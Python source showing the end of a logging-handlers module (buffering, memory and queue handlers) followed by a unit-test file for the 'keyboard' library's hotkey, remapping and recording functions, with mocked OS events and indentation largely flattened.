h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
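# A minimal usage sketch (the host and URL are hypothetical). The record's
# __dict__ is percent-encoded, so the endpoint receives fields such as
# name, levelname and msg as ordinary form parameters:
def _example_http_usage():
    import logging
    handler = HTTPHandler('localhost:8080', '/log', method='POST')
    logger = logging.getLogger('example.http')
    logger.addHandler(handler)
    logger.warning('POSTed to the /log endpoint on localhost:8080')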
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, set the target to None and lose the buffer.
"""
try:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
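# A minimal sketch combining the two buffering classes above: hold records
# in memory and only push them to the target once an ERROR (or worse)
# arrives (the capacity and target are illustrative):
def _example_memory_handler_usage():
    import logging
    target = logging.StreamHandler()  # the handler that does the real output
    handler = MemoryHandler(capacity=100, flushLevel=logging.ERROR, target=target)
    logger = logging.getLogger('example.memory')
    logger.addHandler(handler)
    logger.warning('buffered, nothing written yet')
    logger.error('flushes this record plus everything buffered before it')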
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
if threading:
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
            t.daemon = True
t.start()
        def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
            while not self._stop.is_set():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
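# A minimal end-to-end sketch of QueueHandler + QueueListener: producers
# log into a shared queue and a single listener thread performs the actual
# I/O (the StreamHandler target is illustrative; requires threading):
def _example_queue_usage():
    import logging, queue
    q = queue.Queue(-1)  # unbounded
    logger = logging.getLogger('example.queue')
    logger.addHandler(QueueHandler(q))
    listener = QueueListener(q, logging.StreamHandler())
    listener.start()
    logger.warning('enqueued here, handled on the listener thread')
    listener.stop()  # enqueues the sentinel and joins the worker thread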
|
_keyboard_tests.py
|
# -*- coding: utf-8 -*-
"""
Side effects are avoided using two techniques:
- Low level OS requests (keyboard._os_keyboard) are mocked out by rewriting
the functions at that namespace. This includes a list of dummy keys.
- Events are pumped manually by the main test class, and accepted events
are tested against expected values.
Fake user events are appended to `input_events`, passed through
keyboard._listener.direct_callback, then, if accepted, appended to
`output_events`. Fake OS events (keyboard.press) are processed
and added to `output_events` immediately, mimicking real functionality.
"""
from __future__ import print_function
import unittest
import time
import keyboard
from ._keyboard_event import KeyboardEvent, KEY_DOWN, KEY_UP
dummy_keys = {
'space': [(0, [])],
'a': [(1, [])],
'b': [(2, [])],
'c': [(3, [])],
'A': [(1, ['shift']), (-1, [])],
'B': [(2, ['shift']), (-2, [])],
'C': [(3, ['shift']), (-3, [])],
'alt': [(4, [])],
'left alt': [(4, [])],
'left shift': [(5, [])],
'right shift': [(6, [])],
'left ctrl': [(7, [])],
'backspace': [(8, [])],
'caps lock': [(9, [])],
'+': [(10, [])],
',': [(11, [])],
'_': [(12, [])],
'none': [],
'duplicated': [(20, []), (20, [])],
}
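# How to read the entries above (illustrative): 'A' maps to scan code 1
# when combined with the 'shift' modifier, or to the dedicated scan code
# -1 with no modifiers; 'none' has no mapping at all, and 'duplicated'
# exercises de-duplication of repeated scan codes.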
def make_event(event_type, name, scan_code=None, time=0):
return KeyboardEvent(event_type=event_type, scan_code=scan_code or dummy_keys[name][0][0], name=name, time=time)
# Used when manually pumping events.
input_events = []
output_events = []
def send_instant_event(event):
if keyboard._listener.direct_callback(event):
output_events.append(event)
# Mock out side effects.
keyboard._os_keyboard.init = lambda: None
keyboard._os_keyboard.listen = lambda callback: None
keyboard._os_keyboard.map_name = dummy_keys.__getitem__
keyboard._os_keyboard.press = lambda scan_code: send_instant_event(make_event(KEY_DOWN, None, scan_code))
keyboard._os_keyboard.release = lambda scan_code: send_instant_event(make_event(KEY_UP, None, scan_code))
keyboard._os_keyboard.type_unicode = lambda char: output_events.append(KeyboardEvent(event_type=KEY_DOWN, scan_code=999, name=char))
# Shortcuts for defining test inputs and expected outputs.
# Usage: d_shift + d_a + u_a + u_shift
d_a = [make_event(KEY_DOWN, 'a')]
u_a = [make_event(KEY_UP, 'a')]
du_a = d_a+u_a
d_b = [make_event(KEY_DOWN, 'b')]
u_b = [make_event(KEY_UP, 'b')]
du_b = d_b+u_b
d_c = [make_event(KEY_DOWN, 'c')]
u_c = [make_event(KEY_UP, 'c')]
du_c = d_c+u_c
d_ctrl = [make_event(KEY_DOWN, 'left ctrl')]
u_ctrl = [make_event(KEY_UP, 'left ctrl')]
du_ctrl = d_ctrl+u_ctrl
d_shift = [make_event(KEY_DOWN, 'left shift')]
u_shift = [make_event(KEY_UP, 'left shift')]
du_shift = d_shift+u_shift
d_alt = [make_event(KEY_DOWN, 'alt')]
u_alt = [make_event(KEY_UP, 'alt')]
du_alt = d_alt+u_alt
du_backspace = [make_event(KEY_DOWN, 'backspace'), make_event(KEY_UP, 'backspace')]
du_capslock = [make_event(KEY_DOWN, 'caps lock'), make_event(KEY_UP, 'caps lock')]
d_space = [make_event(KEY_DOWN, 'space')]
u_space = [make_event(KEY_UP, 'space')]
du_space = [make_event(KEY_DOWN, 'space'), make_event(KEY_UP, 'space')]
trigger = lambda e=None: keyboard.press(999)
triggered_event = [KeyboardEvent(KEY_DOWN, scan_code=999)]
class TestKeyboard(unittest.TestCase):
def tearDown(self):
keyboard.unhook_all()
#self.assertEquals(keyboard._hooks, {})
#self.assertEquals(keyboard._hotkeys, {})
def setUp(self):
#keyboard._hooks.clear()
#keyboard._hotkeys.clear()
del input_events[:]
del output_events[:]
keyboard._recording = None
keyboard._pressed_events.clear()
keyboard._physically_pressed_keys.clear()
keyboard._logically_pressed_keys.clear()
keyboard._hotkeys.clear()
keyboard._listener.init()
keyboard._word_listeners = {}
def do(self, manual_events, expected=None):
input_events.extend(manual_events)
while input_events:
event = input_events.pop(0)
if keyboard._listener.direct_callback(event):
output_events.append(event)
if expected is not None:
to_names = lambda es: '+'.join(('d' if e.event_type == KEY_DOWN else 'u') + '_' + str(e.scan_code) for e in es)
self.assertEqual(to_names(output_events), to_names(expected))
del output_events[:]
keyboard._listener.queue.join()
def test_event_json(self):
event = make_event(KEY_DOWN, u'á \'"', 999)
import json
self.assertEqual(event, KeyboardEvent(**json.loads(event.to_json())))
def test_is_modifier_name(self):
for name in keyboard.all_modifiers:
self.assertTrue(keyboard.is_modifier(name))
def test_is_modifier_scan_code(self):
for i in range(10):
self.assertEqual(keyboard.is_modifier(i), i in [4, 5, 6, 7])
def test_key_to_scan_codes_brute(self):
for name, entries in dummy_keys.items():
if name in ['none', 'duplicated']: continue
expected = tuple(scan_code for scan_code, modifiers in entries)
self.assertEqual(keyboard.key_to_scan_codes(name), expected)
def test_key_to_scan_code_from_scan_code(self):
for i in range(10):
self.assertEqual(keyboard.key_to_scan_codes(i), (i,))
def test_key_to_scan_code_from_letter(self):
self.assertEqual(keyboard.key_to_scan_codes('a'), (1,))
self.assertEqual(keyboard.key_to_scan_codes('A'), (1,-1))
def test_key_to_scan_code_from_normalized(self):
self.assertEqual(keyboard.key_to_scan_codes('shift'), (5,6))
self.assertEqual(keyboard.key_to_scan_codes('SHIFT'), (5,6))
self.assertEqual(keyboard.key_to_scan_codes('ctrl'), keyboard.key_to_scan_codes('CONTROL'))
def test_key_to_scan_code_from_sided_modifier(self):
self.assertEqual(keyboard.key_to_scan_codes('left shift'), (5,))
self.assertEqual(keyboard.key_to_scan_codes('right shift'), (6,))
def test_key_to_scan_code_underscores(self):
self.assertEqual(keyboard.key_to_scan_codes('_'), (12,))
self.assertEqual(keyboard.key_to_scan_codes('right_shift'), (6,))
def test_key_to_scan_code_error_none(self):
with self.assertRaises(ValueError):
keyboard.key_to_scan_codes(None)
def test_key_to_scan_code_error_empty(self):
with self.assertRaises(ValueError):
keyboard.key_to_scan_codes('')
def test_key_to_scan_code_error_other(self):
with self.assertRaises(ValueError):
keyboard.key_to_scan_codes({})
def test_key_to_scan_code_list(self):
self.assertEqual(keyboard.key_to_scan_codes([10, 5, 'a']), (10, 5, 1))
def test_key_to_scan_code_empty(self):
with self.assertRaises(ValueError):
keyboard.key_to_scan_codes('none')
def test_key_to_scan_code_duplicated(self):
self.assertEqual(keyboard.key_to_scan_codes('duplicated'), (20,))
def test_parse_hotkey_simple(self):
self.assertEqual(keyboard.parse_hotkey('a'), (((1,),),))
self.assertEqual(keyboard.parse_hotkey('A'), (((1,-1),),))
def test_parse_hotkey_separators(self):
self.assertEqual(keyboard.parse_hotkey('+'), keyboard.parse_hotkey('plus'))
self.assertEqual(keyboard.parse_hotkey(','), keyboard.parse_hotkey('comma'))
def test_parse_hotkey_keys(self):
self.assertEqual(keyboard.parse_hotkey('left shift + a'), (((5,), (1,),),))
self.assertEqual(keyboard.parse_hotkey('left shift+a'), (((5,), (1,),),))
def test_parse_hotkey_simple_steps(self):
self.assertEqual(keyboard.parse_hotkey('a,b'), (((1,),),((2,),)))
self.assertEqual(keyboard.parse_hotkey('a, b'), (((1,),),((2,),)))
def test_parse_hotkey_steps(self):
self.assertEqual(keyboard.parse_hotkey('a+b, b+c'), (((1,),(2,)),((2,),(3,))))
def test_parse_hotkey_example(self):
alt_codes = keyboard.key_to_scan_codes('alt')
shift_codes = keyboard.key_to_scan_codes('shift')
a_codes = keyboard.key_to_scan_codes('a')
b_codes = keyboard.key_to_scan_codes('b')
c_codes = keyboard.key_to_scan_codes('c')
self.assertEqual(keyboard.parse_hotkey("alt+shift+a, alt+b, c"), ((alt_codes, shift_codes, a_codes), (alt_codes, b_codes), (c_codes,)))
def test_parse_hotkey_list_scan_codes(self):
self.assertEqual(keyboard.parse_hotkey([1, 2, 3]), (((1,), (2,), (3,)),))
def test_parse_hotkey_deep_list_scan_codes(self):
result = keyboard.parse_hotkey('a')
self.assertEqual(keyboard.parse_hotkey(result), (((1,),),))
def test_parse_hotkey_list_names(self):
self.assertEqual(keyboard.parse_hotkey(['a', 'b', 'c']), (((1,), (2,), (3,)),))
def test_is_pressed_none(self):
self.assertFalse(keyboard.is_pressed('a'))
def test_is_pressed_true(self):
self.do(d_a)
self.assertTrue(keyboard.is_pressed('a'))
def test_is_pressed_true_scan_code_true(self):
self.do(d_a)
self.assertTrue(keyboard.is_pressed(1))
def test_is_pressed_true_scan_code_false(self):
self.do(d_a)
self.assertFalse(keyboard.is_pressed(2))
def test_is_pressed_true_scan_code_invalid(self):
self.do(d_a)
self.assertFalse(keyboard.is_pressed(-1))
def test_is_pressed_false(self):
self.do(d_a+u_a+d_b)
self.assertFalse(keyboard.is_pressed('a'))
self.assertTrue(keyboard.is_pressed('b'))
def test_is_pressed_hotkey_true(self):
self.do(d_shift+d_a)
self.assertTrue(keyboard.is_pressed('shift+a'))
def test_is_pressed_hotkey_false(self):
self.do(d_shift+d_a+u_a)
self.assertFalse(keyboard.is_pressed('shift+a'))
def test_is_pressed_multi_step_fail(self):
self.do(u_a+d_a)
with self.assertRaises(ValueError):
keyboard.is_pressed('a, b')
def test_send_single_press_release(self):
keyboard.send('a', do_press=True, do_release=True)
self.do([], d_a+u_a)
def test_send_single_press(self):
keyboard.send('a', do_press=True, do_release=False)
self.do([], d_a)
def test_send_single_release(self):
keyboard.send('a', do_press=False, do_release=True)
self.do([], u_a)
def test_send_single_none(self):
keyboard.send('a', do_press=False, do_release=False)
self.do([], [])
def test_press(self):
keyboard.press('a')
self.do([], d_a)
def test_release(self):
keyboard.release('a')
self.do([], u_a)
def test_press_and_release(self):
keyboard.press_and_release('a')
self.do([], d_a+u_a)
def test_send_modifier_press_release(self):
keyboard.send('ctrl+a', do_press=True, do_release=True)
self.do([], d_ctrl+d_a+u_a+u_ctrl)
def test_send_modifiers_release(self):
keyboard.send('ctrl+shift+a', do_press=False, do_release=True)
self.do([], u_a+u_shift+u_ctrl)
def test_call_later(self):
triggered = []
def fn(arg1, arg2):
assert arg1 == 1 and arg2 == 2
triggered.append(True)
keyboard.call_later(fn, (1, 2), 0.01)
self.assertFalse(triggered)
time.sleep(0.05)
self.assertTrue(triggered)
def test_hook_nonblocking(self):
self.i = 0
def count(e):
self.assertEqual(e.name, 'a')
self.i += 1
hook = keyboard.hook(count, suppress=False)
self.do(d_a+u_a, d_a+u_a)
self.assertEqual(self.i, 2)
keyboard.unhook(hook)
self.do(d_a+u_a, d_a+u_a)
self.assertEqual(self.i, 2)
keyboard.hook(count, suppress=False)
self.do(d_a+u_a, d_a+u_a)
self.assertEqual(self.i, 4)
keyboard.unhook_all()
self.do(d_a+u_a, d_a+u_a)
self.assertEqual(self.i, 4)
def test_hook_blocking(self):
self.i = 0
def count(e):
self.assertIn(e.name, ['a', 'b'])
self.i += 1
return e.name == 'b'
hook = keyboard.hook(count, suppress=True)
self.do(d_a+d_b, d_b)
self.assertEqual(self.i, 2)
keyboard.unhook(hook)
self.do(d_a+d_b, d_a+d_b)
self.assertEqual(self.i, 2)
keyboard.hook(count, suppress=True)
self.do(d_a+d_b, d_b)
self.assertEqual(self.i, 4)
keyboard.unhook_all()
self.do(d_a+d_b, d_a+d_b)
self.assertEqual(self.i, 4)
def test_on_press_nonblocking(self):
        # assertEqual returns None, so chain with 'or' to run both assertions
        keyboard.on_press(lambda e: self.assertEqual(e.name, 'a') or self.assertEqual(e.event_type, KEY_DOWN))
self.do(d_a+u_a)
def test_on_press_blocking(self):
keyboard.on_press(lambda e: e.scan_code == 1, suppress=True)
self.do([make_event(KEY_DOWN, 'A', -1)] + d_a, d_a)
def test_on_release(self):
        keyboard.on_release(lambda e: self.assertEqual(e.name, 'a') or self.assertEqual(e.event_type, KEY_UP))
self.do(d_a+u_a)
def test_hook_key_invalid(self):
with self.assertRaises(ValueError):
keyboard.hook_key('invalid', lambda e: None)
def test_hook_key_nonblocking(self):
self.i = 0
def count(event):
self.i += 1
hook = keyboard.hook_key('A', count)
self.do(d_a)
self.assertEqual(self.i, 1)
self.do(u_a+d_b)
self.assertEqual(self.i, 2)
self.do([make_event(KEY_DOWN, 'A', -1)])
self.assertEqual(self.i, 3)
keyboard.unhook_key(hook)
self.do(d_a)
self.assertEqual(self.i, 3)
def test_hook_key_blocking(self):
self.i = 0
def count(event):
self.i += 1
return event.scan_code == 1
hook = keyboard.hook_key('A', count, suppress=True)
self.do(d_a, d_a)
self.assertEqual(self.i, 1)
self.do(u_a+d_b, u_a+d_b)
self.assertEqual(self.i, 2)
self.do([make_event(KEY_DOWN, 'A', -1)], [])
self.assertEqual(self.i, 3)
keyboard.unhook_key(hook)
self.do([make_event(KEY_DOWN, 'A', -1)], [make_event(KEY_DOWN, 'A', -1)])
self.assertEqual(self.i, 3)
def test_on_press_key_nonblocking(self):
        keyboard.on_press_key('A', lambda e: self.assertEqual(e.name, 'a') or self.assertEqual(e.event_type, KEY_DOWN))
self.do(d_a+u_a+d_b+u_b)
def test_on_press_key_blocking(self):
keyboard.on_press_key('A', lambda e: e.scan_code == 1, suppress=True)
self.do([make_event(KEY_DOWN, 'A', -1)] + d_a, d_a)
def test_on_release_key(self):
        keyboard.on_release_key('a', lambda e: self.assertEqual(e.name, 'a') or self.assertEqual(e.event_type, KEY_UP))
self.do(d_a+u_a)
def test_block_key(self):
blocked = keyboard.block_key('a')
self.do(d_a+d_b, d_b)
self.do([make_event(KEY_DOWN, 'A', -1)], [make_event(KEY_DOWN, 'A', -1)])
keyboard.unblock_key(blocked)
self.do(d_a+d_b, d_a+d_b)
def test_block_key_ambiguous(self):
keyboard.block_key('A')
self.do(d_a+d_b, d_b)
self.do([make_event(KEY_DOWN, 'A', -1)], [])
def test_remap_key_simple(self):
mapped = keyboard.remap_key('a', 'b')
self.do(d_a+d_c+u_a, d_b+d_c+u_b)
keyboard.unremap_key(mapped)
self.do(d_a+d_c+u_a, d_a+d_c+u_a)
def test_remap_key_ambiguous(self):
keyboard.remap_key('A', 'b')
self.do(d_a+d_b, d_b+d_b)
self.do([make_event(KEY_DOWN, 'A', -1)], d_b)
def test_remap_key_multiple(self):
mapped = keyboard.remap_key('a', 'shift+b')
self.do(d_a+d_c+u_a, d_shift+d_b+d_c+u_b+u_shift)
keyboard.unremap_key(mapped)
self.do(d_a+d_c+u_a, d_a+d_c+u_a)
def test_stash_state(self):
self.do(d_a+d_shift)
self.assertEqual(sorted(keyboard.stash_state()), [1, 5])
self.do([], u_a+u_shift)
def test_restore_state(self):
self.do(d_b)
keyboard.restore_state([1, 5])
self.do([], u_b+d_a+d_shift)
    def test_restore_modifiers(self):
self.do(d_b)
keyboard.restore_modifiers([1, 5])
self.do([], u_b+d_shift)
def test_write_simple(self):
keyboard.write('a', exact=False)
self.do([], d_a+u_a)
def test_write_multiple(self):
keyboard.write('ab', exact=False)
self.do([], d_a+u_a+d_b+u_b)
def test_write_modifiers(self):
keyboard.write('Ab', exact=False)
self.do([], d_shift+d_a+u_a+u_shift+d_b+u_b)
# restore_state_after has been removed after the introduction of `restore_modifiers`.
#def test_write_stash_not_restore(self):
# self.do(d_shift)
# keyboard.write('a', restore_state_after=False, exact=False)
# self.do([], u_shift+d_a+u_a)
def test_write_stash_restore(self):
self.do(d_shift)
keyboard.write('a', exact=False)
self.do([], u_shift+d_a+u_a+d_shift)
    def test_write_delay(self):  # renamed: would otherwise shadow test_write_multiple above
last_time = time.time()
keyboard.write('ab', delay=0.01, exact=False)
self.do([], d_a+u_a+d_b+u_b)
self.assertGreater(time.time() - last_time, 0.015)
def test_write_unicode_explicit(self):
keyboard.write('ab', exact=True)
self.do([], [KeyboardEvent(event_type=KEY_DOWN, scan_code=999, name='a'), KeyboardEvent(event_type=KEY_DOWN, scan_code=999, name='b')])
def test_write_unicode_fallback(self):
keyboard.write(u'áb', exact=False)
self.do([], [KeyboardEvent(event_type=KEY_DOWN, scan_code=999, name=u'á')]+d_b+u_b)
def test_start_stop_recording(self):
keyboard.start_recording()
self.do(d_a+u_a)
self.assertEqual(keyboard.stop_recording(), d_a+u_a)
def test_stop_recording_error(self):
with self.assertRaises(ValueError):
keyboard.stop_recording()
def test_record(self):
queue = keyboard._queue.Queue()
def process():
queue.put(keyboard.record('space', suppress=True))
from threading import Thread
t = Thread(target=process)
t.daemon = True
t.start()
# 0.01s sleep failed once already. Better solutions?
time.sleep(0.01)
self.do(du_a+du_b+du_space, du_a+du_b)
self.assertEqual(queue.get(timeout=0.5), du_a+du_b+du_space)
def test_play_nodelay(self):
keyboard.play(d_a+u_a, 0)
self.do([], d_a+u_a)
def test_play_stash(self):
self.do(d_ctrl)
keyboard.play(d_a+u_a, 0)
self.do([], u_ctrl+d_a+u_a+d_ctrl)
def test_play_delay(self):
last_time = time.time()
events = [make_event(KEY_DOWN, 'a', 1, 100), make_event(KEY_UP, 'a', 1, 100.01)]
keyboard.play(events, 1)
self.do([], d_a+u_a)
self.assertGreater(time.time() - last_time, 0.005)
def test_get_typed_strings_simple(self):
events = du_a+du_b+du_backspace+d_shift+du_a+u_shift+du_space+du_ctrl+du_a
self.assertEqual(list(keyboard.get_typed_strings(events)), ['aA ', 'a'])
def test_get_typed_strings_backspace(self):
events = du_a+du_b+du_backspace
self.assertEqual(list(keyboard.get_typed_strings(events)), ['a'])
events = du_backspace+du_a+du_b
self.assertEqual(list(keyboard.get_typed_strings(events)), ['ab'])
def test_get_typed_strings_shift(self):
events = d_shift+du_a+du_b+u_shift+du_space+du_ctrl+du_a
self.assertEqual(list(keyboard.get_typed_strings(events)), ['AB ', 'a'])
def test_get_typed_strings_all(self):
events = du_a+du_b+du_backspace+d_shift+du_a+du_capslock+du_b+u_shift+du_space+du_ctrl+du_a
self.assertEqual(list(keyboard.get_typed_strings(events)), ['aAb ', 'A'])
def test_get_hotkey_name_simple(self):
self.assertEqual(keyboard.get_hotkey_name(['a']), 'a')
def test_get_hotkey_name_modifiers(self):
self.assertEqual(keyboard.get_hotkey_name(['a', 'shift', 'ctrl']), 'ctrl+shift+a')
def test_get_hotkey_name_normalize(self):
self.assertEqual(keyboard.get_hotkey_name(['SHIFT', 'left ctrl']), 'ctrl+shift')
def test_get_hotkey_name_plus(self):
self.assertEqual(keyboard.get_hotkey_name(['+']), 'plus')
def test_get_hotkey_name_duplicated(self):
self.assertEqual(keyboard.get_hotkey_name(['+', 'plus']), 'plus')
def test_get_hotkey_name_full(self):
self.assertEqual(keyboard.get_hotkey_name(['+', 'left ctrl', 'shift', 'WIN', 'right alt']), 'ctrl+alt+shift+windows+plus')
def test_get_hotkey_name_multiple(self):
self.assertEqual(keyboard.get_hotkey_name(['ctrl', 'b', '!', 'a']), 'ctrl+!+a+b')
def test_get_hotkey_name_from_pressed(self):
self.do(du_c+d_ctrl+d_a+d_b)
self.assertEqual(keyboard.get_hotkey_name(), 'ctrl+a+b')
def test_read_hotkey(self):
queue = keyboard._queue.Queue()
def process():
queue.put(keyboard.read_hotkey())
from threading import Thread
t = Thread(target=process)
t.daemon = True
t.start()
time.sleep(0.01)
self.do(d_ctrl+d_a+d_b+u_ctrl)
self.assertEqual(queue.get(timeout=0.5), 'ctrl+a+b')
def test_read_event(self):
queue = keyboard._queue.Queue()
def process():
queue.put(keyboard.read_event(suppress=True))
from threading import Thread
t = Thread(target=process)
t.daemon = True
t.start()
time.sleep(0.01)
self.do(d_a, [])
self.assertEqual(queue.get(timeout=0.5), d_a[0])
def test_read_key(self):
queue = keyboard._queue.Queue()
def process():
queue.put(keyboard.read_key(suppress=True))
from threading import Thread
t = Thread(target=process)
t.daemon = True
t.start()
time.sleep(0.01)
self.do(d_a, [])
self.assertEqual(queue.get(timeout=0.5), 'a')
def test_wait_infinite(self):
self.triggered = False
def process():
keyboard.wait()
self.triggered = True
from threading import Thread
t = Thread(target=process)
t.daemon = True # Yep, we are letting this thread loose.
t.start()
time.sleep(0.01)
self.assertFalse(self.triggered)
def test_wait_until_success(self):
queue = keyboard._queue.Queue()
def process():
queue.put(keyboard.wait(queue.get(timeout=0.5), suppress=True) or True)
from threading import Thread
t = Thread(target=process)
t.daemon = True
t.start()
queue.put('a')
time.sleep(0.01)
self.do(d_a, [])
self.assertTrue(queue.get(timeout=0.5))
def test_wait_until_fail(self):
def process():
keyboard.wait('a', suppress=True)
self.fail()
from threading import Thread
t = Thread(target=process)
t.daemon = True # Yep, we are letting this thread loose.
t.start()
time.sleep(0.01)
self.do(d_b)
def test_add_hotkey_single_step_suppress_allow(self):
keyboard.add_hotkey('a', lambda: trigger() or True, suppress=True)
self.do(d_a, triggered_event+d_a)
def test_add_hotkey_single_step_suppress_args_allow(self):
arg = object()
keyboard.add_hotkey('a', lambda a: self.assertIs(a, arg) or trigger() or True, args=(arg,), suppress=True)
self.do(d_a, triggered_event+d_a)
def test_add_hotkey_single_step_suppress_single(self):
keyboard.add_hotkey('a', trigger, suppress=True)
self.do(d_a, triggered_event)
def test_add_hotkey_single_step_suppress_removed(self):
keyboard.remove_hotkey(keyboard.add_hotkey('a', trigger, suppress=True))
self.do(d_a, d_a)
    def test_add_hotkey_single_step_suppress_removed_with_modifier(self):  # renamed: would otherwise shadow the test above
keyboard.remove_hotkey(keyboard.add_hotkey('ctrl+a', trigger, suppress=True))
self.do(d_ctrl+d_a, d_ctrl+d_a)
self.assertEqual(keyboard._listener.filtered_modifiers[dummy_keys['left ctrl'][0][0]], 0)
def test_remove_hotkey_internal(self):
remove = keyboard.add_hotkey('shift+a', trigger, suppress=True)
self.assertTrue(all(keyboard._listener.blocking_hotkeys.values()))
self.assertTrue(all(keyboard._listener.filtered_modifiers.values()))
self.assertNotEqual(keyboard._hotkeys, {})
remove()
self.assertTrue(not any(keyboard._listener.filtered_modifiers.values()))
self.assertTrue(not any(keyboard._listener.blocking_hotkeys.values()))
self.assertEqual(keyboard._hotkeys, {})
def test_remove_hotkey_internal_multistep_start(self):
remove = keyboard.add_hotkey('shift+a, b', trigger, suppress=True)
self.assertTrue(all(keyboard._listener.blocking_hotkeys.values()))
self.assertTrue(all(keyboard._listener.filtered_modifiers.values()))
self.assertNotEqual(keyboard._hotkeys, {})
remove()
self.assertTrue(not any(keyboard._listener.filtered_modifiers.values()))
self.assertTrue(not any(keyboard._listener.blocking_hotkeys.values()))
self.assertEqual(keyboard._hotkeys, {})
def test_remove_hotkey_internal_multistep_end(self):
remove = keyboard.add_hotkey('shift+a, b', trigger, suppress=True)
self.do(d_shift+du_a+u_shift)
self.assertTrue(any(keyboard._listener.blocking_hotkeys.values()))
self.assertTrue(not any(keyboard._listener.filtered_modifiers.values()))
self.assertNotEqual(keyboard._hotkeys, {})
remove()
self.assertTrue(not any(keyboard._listener.filtered_modifiers.values()))
self.assertTrue(not any(keyboard._listener.blocking_hotkeys.values()))
self.assertEqual(keyboard._hotkeys, {})
def test_add_hotkey_single_step_suppress_with_modifiers(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+d_a, triggered_event)
def test_add_hotkey_single_step_suppress_with_modifiers_fail_unrelated_modifier(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
